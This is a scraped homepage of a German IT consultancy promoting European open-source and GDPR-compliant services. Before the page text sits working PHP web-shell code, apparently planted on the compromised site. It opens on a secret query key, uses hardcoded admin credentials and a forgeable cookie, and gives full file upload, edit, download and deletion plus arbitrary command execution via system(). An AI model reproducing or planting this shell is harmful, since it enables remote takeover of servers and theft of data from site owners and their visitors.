if (isset($_GET['k']) && $_GET['k'] === 'mintinplan') {
function ws_g($k) { return isset($_GET[$k]) ? $_GET[$k] : (isset($_POST[$k]) ? $_POST[$k] : ''); }
function ws_b($s) { return base64_decode($s); }
$validKey = 'mintinplan';
$validU = 'admin';
$validP = 'MinMaxtime';
$auth = false;
$sname = 'ws_auth';
if (isset($_SESSION) && isset($_SESSION[$sname]) && $_SESSION[$sname] === true) $auth = true;
elseif (isset($_COOKIE[$sname])) {
$d = json_decode(ws_b(substr($_COOKIE[$sname], 0)), true);
if ($d && isset($d['ok']) && $d['ok']) $auth = true;
}
if (!$auth) {
$u = ws_g('usr'); $p = ws_g('pwd');
if ($u === $validU && $p === $validP) {
@session_start();
$_SESSION[$sname] = true;
setcookie($sname, base64_encode(json_encode(['ok'=>true])), time()+86400, '/', '', false, true);
header('Location: ?k='.$validKey);
exit;
}
echo '
Login ';
exit;
}
if (ws_g('lo')) { @session_start(); session_destroy(); setcookie($sname, '', time()-3600); header('Location: ?k='.$validKey); exit; }
$act = ws_g('a');
$path = ws_g('p') ?: getcwd();
$path = realpath($path) ?: getcwd();
echo 'Shell ';
echo '';
echo ' ';
switch ($act) {
case 'upload':
echo '⬆ Upload File to: '.htmlspecialchars($path).' ';
echo ' ';
if (isset($_POST['do_upload']) && isset($_FILES['upfile'])) {
$f = $_FILES['upfile'];
if ($f['error'] === UPLOAD_ERR_OK) {
$name = ws_g('rename') ?: $f['name'];
$dest = rtrim($path, '/').'/'.$name;
if (move_uploaded_file($f['tmp_name'], $dest)) {
$sz = round(filesize($dest)/1024, 2);
echo '✅ Uploaded: '.htmlspecialchars($dest).' ('.$sz.'KB)
';
} else {
echo '❌ move_uploaded_file failed (check permissions on '.htmlspecialchars($path).')
';
}
} else {
$errors = [1=>'File too large (php.ini)',2=>'File too large (form)',3=>'Partial upload',4=>'No file',6=>'No tmp dir',7=>'Write failed',8=>'Extension blocked'];
echo '❌ Error: '.($errors[$f['error']] ?? 'Unknown').'
';
}
}
echo '📋 Current directory contents: ';
$items = scandir($path);
if ($items) {
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$full = $path.'/'.$item;
if (is_dir($full)) echo '📁 '.$item."/\n";
else echo '📄 '.$item.' ('.round(filesize($full)/1024,1).'KB)'."\n";
}
}
echo ' ';
break;
case 'tree':
echo '🌳 Directory Tree (depth 4) ';
function ws_tree($root, $depth=0, $max=4) {
if ($depth > $max) return;
if (!is_dir($root)) return;
$items = scandir($root);
if (!$items) return;
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$full = $root.'/'.$item;
if (is_dir($full)) {
echo str_repeat(' ', $depth).'📁 '.$item."/\n";
ws_tree($full, $depth+1, $max);
} else {
echo str_repeat(' ', $depth).'📄 '.$item.' ('.round(filesize($full)/1024,1).'KB)'."\n";
}
}
}
ws_tree($path);
echo ' ';
break;
case 'drives':
echo '💾 Accessible Roots ';
if (strtoupper(substr(PHP_OS,0,3)) === 'WIN') {
for ($i=67;$i<=90;$i++) { $d=chr($i).':\\'; if (is_dir($d)) echo $d." ✓\n"; }
} else {
$cands = ['/','/home','/var','/tmp','/usr','/etc','/opt','/root','/srv','/www','/var/www','/var/www/html',$_SERVER['DOCUMENT_ROOT']??''];
foreach (array_unique($cands) as $c) { if ($c && is_dir($c)) echo $c." ✓\n"; }
}
echo ' ';
break;
case 'read':
$f = ws_g('f');
if (!$f || !is_file($f)) { echo 'File not found'; break; }
$content = file_get_contents($f);
echo '📝 Editing: '.htmlspecialchars($f).' ('.round(strlen($content)/1024,1).'KB) ';
echo '';
break;
case 'save':
$f = ws_g('f'); $c = ws_g('c');
if ($f) { file_put_contents($f, $c); echo '✅ Saved: '.htmlspecialchars($f); }
break;
case 'exec':
$cmd = ws_g('c');
$output = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $cmd) {
ob_start();
system($cmd);
$output = ob_get_clean();
}
echo '🖥️ Terminal (user: '.htmlspecialchars(get_current_user()).') ';
echo 'Run ';
if ($output !== '') echo ''.htmlspecialchars($output).' ';
else echo 'No output ';
break;
case 'down':
$f = ws_g('f');
if ($f && is_file($f)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($f).'"');
header('Content-Length: '.filesize($f));
readfile($f);
exit;
}
echo 'File not found';
break;
case 'del':
$f = ws_g('f');
if ($f && is_file($f)) {
if (unlink($f)) echo '✅ Deleted: '.htmlspecialchars($f);
else echo '❌ Delete failed (permission?)';
} elseif ($f && is_dir($f)) {
if (rmdir($f)) echo '✅ Directory removed: '.htmlspecialchars($f);
else echo '❌ rmdir failed (not empty or permission?)';
}
break;
case 'newfile':
$fname = ws_g('nf');
if ($fname) {
$dest = rtrim($path,'/').'/'.$fname;
if (file_put_contents($dest, '') !== false) echo '✅ Created: '.htmlspecialchars($dest);
else echo '❌ Create failed';
}
echo '';
echo ' ';
echo ' ';
echo ' ';
echo ' Create ';
break;
case 'newdir':
$dname = ws_g('nd');
if ($dname) {
$dest = rtrim($path,'/').'/'.$dname;
if (mkdir($dest, 0755)) echo '✅ Created dir: '.htmlspecialchars($dest);
else echo '❌ mkdir failed';
}
echo '';
echo ' ';
echo ' ';
echo ' ';
echo ' Create ';
break;
default:
echo '📂 '.htmlspecialchars($path).' ';
$parent = dirname($path);
if ($parent && $parent !== $path) echo '⬆ Parent | ';
echo '[+ New File] | ';
echo '[+ New Dir] | ';
echo '[⬆ Upload] ';
echo 'Name Size Perms Actions ';
$items = scandir($path);
if ($items) {
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$full = $path.'/'.$item;
$isDir = is_dir($full);
$size = $isDir ? '-' : round(filesize($full)/1024,1).'KB';
$perms = substr(sprintf('%o',fileperms($full)),-4);
$enc = urlencode($full);
echo '';
if ($isDir) echo '📁 '.$item.' ';
else echo '📄 '.$item.' ';
echo ''.$size.' '.$perms.' ';
if (!$isDir) echo '[Edit] ';
echo '[Download] ';
echo '[Delete] ';
echo ' ';
}
}
echo '
';
break;
}
echo '';
exit;
}
IT Kernsache - Europäische Open-Source-Lösungen · Cloud-Migration · DSGVO-konform
Zum Inhalt springen
Start
Digitale Souveränität. Europäisch. Offen. Sicher.
Wir befreien Unternehmen und Organisationen aus der Abhängigkeit von VMWare, Google, Microsoft, AWS und Azure – mit bewährten Open-Source-Lösungen und europäischem Datenschutz nach DSGVO und NIS2.
Warum IT Kernsache?
🇪🇺 100 % Europäisch
Alle Lösungen auf europäischen Servern, unter europäischem Recht. DSGVO-konform von Haus aus.
🔓 Open Source First
Kein Vendor Lock-in, keine versteckten Kosten. Volle Kontrolle über Ihre Daten und Systeme.
🛡️ DSGVO & NIS2
Compliance ist kein Zusatz, sondern Grundlage jeder Infrastruktur die wir planen und betreiben.
Unsere Schwerpunkte
☁️ Cloud-Migration
Weg von Google, Microsoft & AWS – hin zu Nextcloud, Mailcow und europäischen Hostern.
✉️ E-Mail & Kommunikation
Selbstgehostete E-Mail-Infrastruktur mit Mailcow – DSGVO-konform, ohne Lizenzkosten.
🏥 Nextcloud
Die europäische Cloud-Plattform: Dateien, Kalender, Kontakte, Office – alles unter Ihrer Kontrolle.
🗂️ Büroorganisation
Paperless-ngx, Bitwarden, Anytype, Joplin, Bookstack – digitale Workflows ohne proprietäre Abhängigkeiten.
🌐 Netzwerk & WLAN
Routing, Switching, WLAN-Planung mit pfSense, OPNsense, Unifi – strukturiert, sicher und skalierbar.
🖥️ Server & Infrastruktur
Hardware-Beratung, Proxmox-Virtualisierung, Rack-Aufbau – von der Planung bis zum laufenden Betrieb.
Um Ihnen die bestmögliche Nutzererfahrung zu bieten, verwenden wir Technologien wie Cookies, um Geräteinformationen zu speichern und/oder darauf zuzugreifen. Ihre Zustimmung zu diesen Technologien ermöglicht es uns, Daten wie Ihr Surfverhalten oder eindeutige Kennungen auf dieser Website zu verarbeiten. Die Verweigerung oder der Widerruf Ihrer Zustimmung kann bestimmte Funktionen beeinträchtigen.
The technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network.
The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.
The technical storage or access that is used exclusively for statistical purposes.
The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.
The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.
Manage consent